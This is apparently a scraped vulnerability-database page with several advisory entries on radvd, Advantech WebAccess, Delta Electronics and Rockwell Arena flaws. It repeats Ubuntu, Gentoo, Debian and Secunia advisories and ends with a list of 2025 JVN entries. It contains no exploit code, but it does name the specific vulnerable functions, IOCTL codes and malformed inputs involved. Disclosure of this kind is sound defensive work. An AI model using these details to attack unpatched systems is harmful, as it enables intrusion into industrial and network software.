http://www.cisco.com/go/psirt +-------------------------------------------------------------------- Copyright 2010-2011 Cisco Systems, Inc. All rights reserved. +-------------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (SunOS) iFcDBQFOb9w/QXnnBKKRMNARCBomAP9pCiRwCB8z3oe3IWB2XXNzeaQxAwoq0gQ4 6znwu3lLSAD/Y6o+u8AofSMxkj3THWIdpbjVXKQXMal/BhxDhN5fsI8= =Ybok -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201908-0863 Rockwell Automation Arena Simulation Software versions 16.00.00 and earlier contain a USE AFTER FREE CWE-416. A maliciously crafted Arena file opened by an unsuspecting user may result in the application crashing or the execution of arbitrary code. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of DOE files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. 9502-Ax) 16.00.00 and earlier versions have resource management error vulnerabilities
var-201402-0027 The process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to cause a denial of service (stack-based buffer over-read and crash) via unspecified vectors. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A security vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0028 The process_rs function in the router advertisement daemon (radvd) before 1.8.2, when UnicastOnly is enabled, allows remote attackers to cause a denial of service (temporary service hang) via a large number of ND_ROUTER_SOLICIT requests. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. An input validation vulnerability exists in the 'process_rs' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2323-1 security@debian.org http://www.debian.org/security/ Yves-Alexis Perez October 26, 2011 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : radvd Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-3602 CVE-2011-3604 CVE-2011-3605 Debian Bug : 644614 Multiple security issues were discovered by Vasiliy Kulikov in radvd, an IPv6 Router Advertisement daemon: CVE-2011-3602 set_interface_var() function doesn't check the interface name, which is chosen by an unprivileged user. CVE-2011-3604 process_ra() function lacks multiple buffer length checks which could lead to memory reads outside the stack, causing a crash of the daemon. CVE-2011-3605 process_rs() function calls mdelay() (a function to wait for a defined time) unconditionnally when running in unicast-only mode. As this call is in the main thread, that means all request processing is delayed (for a time up to MAX_RA_DELAY_TIME, 500 ms by default). Note: upstream and Debian default is to use anycast mode. For the oldstable distribution (lenny), this problem has been fixed in version 1:1.1-3.1. For the stable distribution (squeeze), this problem has been fixed in version 1:1.6-1.1. For the testing distribution (wheezy), this problem has been fixed in version 1:1.8-1.2. For the unstable distribution (sid), this problem has been fixed in version 1:1.8-1.2. We recommend that you upgrade your radvd packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux) iEYEARECAAYFAk6q2QcACgkQXm3vHE4uylqlEQCgpdFwHzpKLF6KHlJs4y/ykeo/ oEYAniJXFaff25pMtXzM6Ovu8zslZm7H =VfHu -----END PGP SIGNATURE-----
var-201402-0026 Buffer overflow in the process_ra function in the router advertisement daemon (radvd) before 1.8.2 allows remote attackers to execute arbitrary code or cause a denial of service (crash) via a negative value in a label_len value. radvd is prone to the follow security vulnerabilities: 1. Multiple local privilege-escalation vulnerability. 2. A local arbitrary file-overwrite vulnerability. 3. Multiple remote denial-of-service vulnerabilities. An attacker can exploit these issues to execute arbitrary code with administrative privileges, overwrite arbitrary files, and cause denial-of-service conditions. The software can replace IPv6 routing for stateless address auto-configuration. A buffer overflow vulnerability exists in the 'process_ra' function in radvd 1.8.1 and earlier. ========================================================================== Ubuntu Security Notice USN-1257-1 November 10, 2011 radvd vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 11.10 - Ubuntu 11.04 - Ubuntu 10.10 - Ubuntu 10.04 LTS Summary: radvd could be made to crash or overwrite certain files if it received specially crafted network traffic. Software Description: - radvd: Router Advertisement Daemon Details: Vasiliy Kulikov discovered that radvd incorrectly parsed the ND_OPT_DNSSL_INFORMATION option. The default compiler options for affected releases should reduce the vulnerability to a denial of service. This issue only affected Ubuntu 11.04 and 11.10. (CVE-2011-3601) Vasiliy Kulikov discovered that radvd incorrectly filtered interface names when creating certain files. (CVE-2011-3602) Vasiliy Kulikov discovered that radvd incorrectly handled certain lengths. (CVE-2011-3604) Vasiliy Kulikov discovered that radvd incorrectly handled delays when used in unicast mode, which is not the default in Ubuntu. If used in unicast mode, a remote attacker could cause radvd outages, resulting in a denial of service. (CVE-2011-3605) Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 11.10: radvd 1:1.8-1ubuntu0.1 Ubuntu 11.04: radvd 1:1.7-1ubuntu0.1 Ubuntu 10.10: radvd 1:1.6-1ubuntu0.1 Ubuntu 10.04 LTS: radvd 1:1.3-1.1ubuntu0.1 In general, a standard system update will make all the necessary changes. References: http://www.ubuntu.com/usn/usn-1257-1 CVE-2011-3601, CVE-2011-3602, CVE-2011-3604, CVE-2011-3605 Package Information: https://launchpad.net/ubuntu/+source/radvd/1:1.8-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.7-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.6-1ubuntu0.1 https://launchpad.net/ubuntu/+source/radvd/1:1.3-1.1ubuntu0.1 . ---------------------------------------------------------------------- Secunia is hiring! Find your next job here: http://secunia.com/company/jobs/ ---------------------------------------------------------------------- TITLE: Gentoo update for radvd SECUNIA ADVISORY ID: SA46930 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46930/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 RELEASE DATE: 2011-11-21 DISCUSS ADVISORY: http://secunia.com/advisories/46930/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/46930/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=46930 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Gentoo has issued an update for radvd. For more information: SA46200 SOLUTION: Update to "net-misc/radvd-1.8.2" or later. ORIGINAL ADVISORY: GLSA 201111-08: http://www.gentoo.org/security/en/glsa/glsa-201111-08.xml OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: radvd: Multiple vulnerabilities Date: November 20, 2011 Bugs: #385967 ID: 201111-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in radvd which could potentially lead to privilege escalation, data loss, or a Denial of Service. Background ========== radvd is an IPv6 router advertisement daemon for Linux and BSD. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/radvd < 1.8.2 >= 1.8.2 Description =========== Multiple vulnerabilities have been discovered in radvd. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All radvd users should upgrade to the latest stable version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/radvd-1.8.2" References ========== [ 1 ] CVE-2011-3601 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3601 [ 2 ] CVE-2011-3602 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3602 [ 3 ] CVE-2011-3603 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3603 [ 4 ] CVE-2011-3604 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3604 [ 5 ] CVE-2011-3605 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3605 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201111-08.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5
var-201803-1810 A Stack-based Buffer Overflow issue was discovered in Delta Electronics Delta Industrial Automation DOPSoft, Version 4.00.01 or prior. Stack-based buffer overflow vulnerabilities caused by processing specially crafted .dop or .dpb files may allow an attacker to remotely execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation DOPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the BackgroundMacro structure in a DPA file. An attacker can leverage this vulnerability to execute code under the context of the current process
var-201810-0396 Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment
var-201702-0423 An issue was discovered in Delta Electronics WPLSoft, Versions prior to V2.42.11, ISPSoft, Versions prior to 3.02.11, and PMSoft, Versions prior to2.10.10. There are multiple instances of heap-based buffer overflows that may allow malicious files to cause the execution of arbitrary code or a denial of service. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation ISPSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of dvp files. The process does not properly validate the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of current process. Delta Electronics WPLSoft and others are software control platforms used by Delta Electronics to edit the Delta DVP series of programmable logic controllers (PLCs). A heap buffer overflow vulnerability exists in several Delta Electronics products
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the command line in the bwmail utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. versions prior to Advantech WebAccess 8.3 are vulnerable
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
jvndb-2025-007519 Multiple vulnerabilities in multiple BROTHER products 2025-06-26T18:15+09:00 2025-09-22T10:16+09:00
jvndb-2025-014105 OMRON SOCIAL SOLUTIONS Uninterruptible Power Supply (UPS) management application registers a Windows service with an unquoted file path 2025-09-19T16:21+09:00 2025-09-19T16:21+09:00
jvndb-2025-014104 Multiple vulnerabilities in I-O DATA wireless LAN routers 2025-09-19T14:58+09:00 2025-09-19T14:58+09:00
jvndb-2025-014081 Multiple Brother and its OEM products with weak initial administrator passwords 2025-09-19T10:52+09:00 2025-09-19T10:52+09:00
jvndb-2025-000079 UNIVERGE IX/IX-R/IX-V series routers provided by NEC Corporation vulnerable to cross-site scripting 2025-09-18T17:43+09:00 2025-09-18T17:43+09:00
jvndb-2025-000078 Century HW RAID Manager registers a Windows service with an unquoted file path 2025-09-17T13:45+09:00 2025-09-17T13:45+09:00
jvndb-2025-000048 WTW-EAGLE App vulnerable to improper server certificate validation 2025-09-12T13:57+09:00 2025-09-12T13:57+09:00
jvndb-2025-000070 "Gunosy" App vulnerable to insertion of sensitive information into sent data 2025-09-02T14:20+09:00 2025-09-09T09:51+09:00
jvndb-2025-000077 RICOH Streamline NX vulnerable to tampering with operation history 2025-09-08T13:42+09:00 2025-09-08T13:42+09:00
jvndb-2025-000072 Obsidian GitHub Copilot Plugin stores sensitive information in cleartext 2025-09-05T16:52+09:00 2025-09-05T16:52+09:00
jvndb-2025-000073 RATOC RAID Monitoring Manager for Windows registers a Windows service with an unquoted file path 2025-09-05T16:20+09:00 2025-09-05T16:20+09:00
jvndb-2025-000071 "Yahoo! Shopping" App for Android fails to restrict custom URL schemes properly 2025-09-05T15:12+09:00 2025-09-05T15:12+09:00
jvndb-2025-000075 Multiple vulnerabilities in TkEasyGUI 2025-09-05T14:53+09:00 2025-09-05T14:53+09:00
